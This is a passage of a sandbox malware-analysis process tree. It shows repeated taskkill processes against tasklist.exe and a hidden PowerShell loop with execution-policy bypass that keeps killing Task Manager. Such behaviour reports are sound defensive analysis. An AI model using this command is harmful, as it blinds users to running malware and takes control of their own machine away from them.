  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2712
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2736
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1792
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3684
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1820
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4784
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4776
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3228
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1176
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:760
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:888
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3080
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3408
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2644
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4340
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3932
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3076
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1652
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4472
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4420
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2008
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1080
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4892
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3344
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3900
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4132
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3712
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4472
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      Kills process with taskkill
      PID:4072
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4192
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3144
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3944
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1540
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2812
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2408
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:772
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4420
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1464
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:668
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4160
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4880
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:600
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2708
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4500
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3768
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:836
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4516
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3296
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2384
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2708
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4064
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4784
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4048
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4160
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5080
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:772
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4012
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3664
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3216
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4556
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3740
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4472
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3288
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2720
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2008
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4032
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4460
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2444
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1056
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2940
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3604
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4384
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3788
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4800
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2812
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:836
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4580
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3508
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3752
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1412
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1656
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3756
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:760
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1284
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3408
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4492
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4836
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3280
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3880
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4536
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1272
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:3196
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4472
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:1668
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      Kills process with taskkill
      PID:3984
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
      4⤵
      PID:4048
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im taskmgr.exe}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4600
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4364
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4500
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2268
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4080
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4804
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4460
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3936
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2800
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3120
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3212
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3424
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3000
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:5032
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:3256
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4512
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4368
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4752
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1248
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:796
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3724
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3876
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4676
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3408
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3224
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1464
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4792
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2076
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1260
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2760
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3624
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:4920
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2988
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3712
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4424
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2040
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1124
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:4416
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2868
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4936
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2500
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2860
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3664
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2716
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4808
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4804
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:3972
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:268
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3136
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4580
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3644
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1896
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1760
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3816
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3280
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4776
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4184
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:788
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2000
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3692
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4528
